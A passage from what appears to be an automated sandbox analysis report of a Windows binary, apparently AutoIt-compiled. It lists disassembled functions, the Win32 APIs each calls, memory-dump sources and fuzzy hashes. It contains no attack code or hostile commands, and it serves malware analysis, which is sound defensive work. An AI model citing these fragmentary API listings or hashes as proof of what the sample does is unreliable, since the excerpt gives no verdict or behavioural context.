                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 2537439066-0
                                                                  • Opcode ID: a8c954e0af27c7bc7a193166701950eee675b5f2c4b51923db46374f1bbdb7f7
                                                                  • Instruction ID: 00a53c07ee8ad5280487c33281335240203397b32d7926a122d43f9ec7d8a637
                                                                  • Opcode Fuzzy Hash: a8c954e0af27c7bc7a193166701950eee675b5f2c4b51923db46374f1bbdb7f7
                                                                  • Instruction Fuzzy Hash: 81315231900105AFDF129F99DD85E6BB778FF45310F1480AAF905AB24AD770DE14DBA0
                                                                  Function 003A9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,003A77F4,?,?,00000000,00000001), ref: 003A9B53
                                                                    • Part of subcall function 003A6544: GetWindowRect.USER32(?,?), ref: 003A6557
                                                                  • GetDesktopWindow.USER32 ref: 003A9B7D
                                                                  • GetWindowRect.USER32(00000000), ref: 003A9B84
                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003A9BB6
                                                                    • Part of subcall function 00397A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  • GetCursorPos.USER32(?), ref: 003A9BE2
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003A9C44
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                  • String ID:
                                                                  • API String ID: 4137160315-0
                                                                  • Opcode ID: f8f81c3cb79ff079346b54409b04aaa0e794c34a226ca44a866bd86fdd0f0f38
                                                                  • Instruction ID: 0520664935d85e744f02024685fbd227a498b2d210c35dd8d79e7955fcbb8a02
                                                                  • Opcode Fuzzy Hash: f8f81c3cb79ff079346b54409b04aaa0e794c34a226ca44a866bd86fdd0f0f38
                                                                  • Instruction Fuzzy Hash: 3231CF72504309ABC711DF14EC49F9AB7EDFF8A314F000A1AF595E7181DA31EA08CBA2
                                                                  Function 0038AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0038AFAE
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0038AFB5
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0038AFC4
                                                                  • CloseHandle.KERNEL32(00000004), ref: 0038AFCF
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0038AFFE
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 0038B012
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  • Opcode ID: 406a377b07054aa1a09ecb00abe7a901da4130e7152f45b184ba9e8259d7bbd6
                                                                  • Instruction ID: 71731471647f99c843487db1bc200347d3dba7c194bfe503367a8758e6285d46
                                                                  • Opcode Fuzzy Hash: 406a377b07054aa1a09ecb00abe7a901da4130e7152f45b184ba9e8259d7bbd6
                                                                  • Instruction Fuzzy Hash: EB217CB2145309ABDB039FA4ED09BAE7BADAB44304F044096FA01A2161C3768D21EB61
                                                                  Function 003BEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0036AFE3
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036AFF2
                                                                    • Part of subcall function 0036AF83: BeginPath.GDI32(?), ref: 0036B009
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036B033
                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003BEC20
                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 003BEC34
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003BEC42
                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 003BEC52
                                                                  • EndPath.GDI32(00000000), ref: 003BEC62
                                                                  • StrokePath.GDI32(00000000), ref: 003BEC72
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                  • String ID:
                                                                  • API String ID: 43455801-0
                                                                  • Opcode ID: 6bc8e48945c1ae33b80758e9decd55a2ba773df288a1b0c3bf9dba3929b98148
                                                                  • Instruction ID: 5aba16cee5c4a0065ff2f6e5812b3c0d70d73928da5de2bfc619f46b96d0ebd0
                                                                  • Opcode Fuzzy Hash: 6bc8e48945c1ae33b80758e9decd55a2ba773df288a1b0c3bf9dba3929b98148
                                                                  • Instruction Fuzzy Hash: 7711C572001149BFEB129FA4ED88EEA7F6DEB08354F048122FA199A160D7719D55DBA0
                                                                  Function 0038E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0038E1C0
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0038E1D1
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0038E1D8
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0038E1E0
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0038E1F7
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0038E209
                                                                    • Part of subcall function 00389AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00389A05,00000000,00000000,?,00389DDB), ref: 0038A53A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                  • String ID:
                                                                  • API String ID: 603618608-0
                                                                  • Opcode ID: 4f695dcf8169e870c9b7e64fa6ee04edee16a18565360589a38150854bd13fc5
                                                                  • Instruction ID: e5be3b47e4cb3d7a979c79d778abae10613dcbf4a529cf34c0769c4a1e81a1a0
                                                                  • Opcode Fuzzy Hash: 4f695dcf8169e870c9b7e64fa6ee04edee16a18565360589a38150854bd13fc5
                                                                  • Instruction Fuzzy Hash: C6018FB5A40314BFEB11ABA6DC49B5EBFB8EB48351F004066EE04AB290D6709C00CBA0
                                                                  Function 00377B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 00377B47
                                                                    • Part of subcall function 0037123A: __initp_misc_winsig.LIBCMT ref: 0037125E
                                                                    • Part of subcall function 0037123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00377F51
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00377F65
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00377F78
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00377F8B
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00377F9E
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00377FB1
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00377FC4
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00377FD7
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00377FEA
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00377FFD
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00378010
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00378023
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00378036
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00378049
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0037805C
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0037806F
                                                                  • __mtinitlocks.LIBCMT ref: 00377B4C
                                                                    • Part of subcall function 00377E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0040AC68,00000FA0,?,?,00377B51,00375E77,00406C70,00000014), ref: 00377E41
                                                                  • __mtterm.LIBCMT ref: 00377B55
                                                                    • Part of subcall function 00377BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00377B5A,00375E77,00406C70,00000014), ref: 00377D3F
                                                                    • Part of subcall function 00377BBD: _free.LIBCMT ref: 00377D46
                                                                    • Part of subcall function 00377BBD: DeleteCriticalSection.KERNEL32(0040AC68,?,?,00377B5A,00375E77,00406C70,00000014), ref: 00377D68
                                                                  • __calloc_crt.LIBCMT ref: 00377B7A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00377BA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 2942034483-0
                                                                  • Opcode ID: 8d816ba89eb9775be9d310aa13ad85d284f69d51f79b9cd4a04544a56e1dadc5
                                                                  • Instruction ID: 05e222fa5e1efea4de496eae5a6b73e6bdbafdeaf830e34b166ea21b61904c38
                                                                  • Opcode Fuzzy Hash: 8d816ba89eb9775be9d310aa13ad85d284f69d51f79b9cd4a04544a56e1dadc5
                                                                  • Instruction Fuzzy Hash: 55F0B43211D71219E67777347C0BA4B27C49F02730B21C6A9F86CDD1E2FF2C88614965
                                                                  Function 003527EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0035281D
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00352825
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00352830
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0035283B
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00352843
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035284B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: 617d0649140179aece7bf31c97c0f2d16932e0a9f0ed11533a879f871a8ce229
                                                                  • Instruction ID: 3a57f869e2a4ede966e4a4b4d0533183eddac50b8421eab50eed57f0da7b9f88
                                                                  • Opcode Fuzzy Hash: 617d0649140179aece7bf31c97c0f2d16932e0a9f0ed11533a879f871a8ce229
                                                                  • Instruction Fuzzy Hash: 1D0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                  Function 00399AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 1423608774-0
                                                                  • Opcode ID: 46cb0abb90cc9cde29d8e6ae956aff3288f5d5d63d56995d33bef362b1c195fb
                                                                  • Instruction ID: ff674d7b8fa12d41ecaec6fc44fe25069245c20a588158ce3f474cebfe3aacd1
                                                                  • Opcode Fuzzy Hash: 46cb0abb90cc9cde29d8e6ae956aff3288f5d5d63d56995d33bef362b1c195fb
                                                                  • Instruction Fuzzy Hash: 69018136542211ABDB171B6CFC88EEB776DFF88701B05082FF503960A0DB649800DB50
                                                                  Function 00397BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00397C07
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00397C1D
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00397C2C
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00397C3B
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00397C45
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00397C4C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: 9d2996e39cac6497579d01b6e3ff1c06bf408cc371ca468204df428d6bf865c0
                                                                  • Instruction ID: 7406e119f1dd74e2a3edb926d23d1ec69ad9f40e0fc439e772683c8518b7fa92
                                                                  • Opcode Fuzzy Hash: 9d2996e39cac6497579d01b6e3ff1c06bf408cc371ca468204df428d6bf865c0
                                                                  • Instruction Fuzzy Hash: FAF05E76242158BBE7225B62AC0EEEF7F7CEFC6B11F40001AFA01D1091D7A05A41C6B5
                                                                  Function 00399A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00399A33
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A44
                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A51
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A5E
                                                                    • Part of subcall function 003993D1: CloseHandle.KERNEL32(?,?,00399A6B,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 003993DB
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00399A71
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: be4818fd7a6193b831eae1ae8097ebc2b2cef148ab369bc7179eb80586b56e7a
                                                                  • Instruction ID: a98c247ad406eac35e401d753b08ab6bd63818400e75f0713d01a7c2ef581be8
                                                                  • Opcode Fuzzy Hash: be4818fd7a6193b831eae1ae8097ebc2b2cef148ab369bc7179eb80586b56e7a
                                                                  • Instruction Fuzzy Hash: E5F05E36582211ABD7131BA8FC89EAA772DFF85301F150827F503950A4DB759801DB50
                                                                  Function 00351CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036F4EA: std::exception::exception.LIBCMT ref: 0036F51E
                                                                    • Part of subcall function 0036F4EA: __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                  • __swprintf.LIBCMT ref: 00351EA6
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00351D49
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 2125237772-557222456
                                                                  • Opcode ID: 363c762c9bf19314300d789d1abff073850c8b8d41945b4e32389aaa6c186d2c
                                                                  • Instruction ID: e0ae9a06f93d88186174ecd0cc166ae12b15cd6e211da287305fe55c87c4bc42
                                                                  • Opcode Fuzzy Hash: 363c762c9bf19314300d789d1abff073850c8b8d41945b4e32389aaa6c186d2c
                                                                  • Instruction Fuzzy Hash: 71917B715142019FC726EF25C896D6AB7B8AF85701F01491DFC899B2B1DB70EE08CB92
                                                                  Function 003AAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 003AB006
                                                                  • CharUpperBuffW.USER32(?,?), ref: 003AB115
                                                                  • VariantClear.OLEAUT32(?), ref: 003AB298
                                                                    • Part of subcall function 00399DC5: VariantInit.OLEAUT32(00000000), ref: 00399E05
                                                                    • Part of subcall function 00399DC5: VariantCopy.OLEAUT32(?,?), ref: 00399E0E
                                                                    • Part of subcall function 00399DC5: VariantClear.OLEAUT32(?), ref: 00399E1A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: 376eb73791803745ec25de7b8674338b5e10fdc6fa255e5f3630ab314aa5fad0
                                                                  • Instruction ID: 18ed3b29d8a4454956cf77646fff2082f2681cb3e19f3b84dcb66816a547f4ba
                                                                  • Opcode Fuzzy Hash: 376eb73791803745ec25de7b8674338b5e10fdc6fa255e5f3630ab314aa5fad0
                                                                  • Instruction Fuzzy Hash: 1C917D306043019FCB11DF24C495A5ABBF8EF8A704F04486EF89A9B362DB31E949CB52
                                                                  Function 00395347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                  • _memset.LIBCMT ref: 00395438
                                                                  • GetMenuItemInfoW.USER32(?), ref: 00395467
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00395513
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0039553D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: 1c2834845b3e578f290f7337d69ccb23b9e47fdde7818e3ad6ab7ec532bd4971
                                                                  • Instruction ID: b34d819ecb1abb11f539964b7351ee2559f107c9907ded6a5f5159bece801254
                                                                  • Opcode Fuzzy Hash: 1c2834845b3e578f290f7337d69ccb23b9e47fdde7818e3ad6ab7ec532bd4971
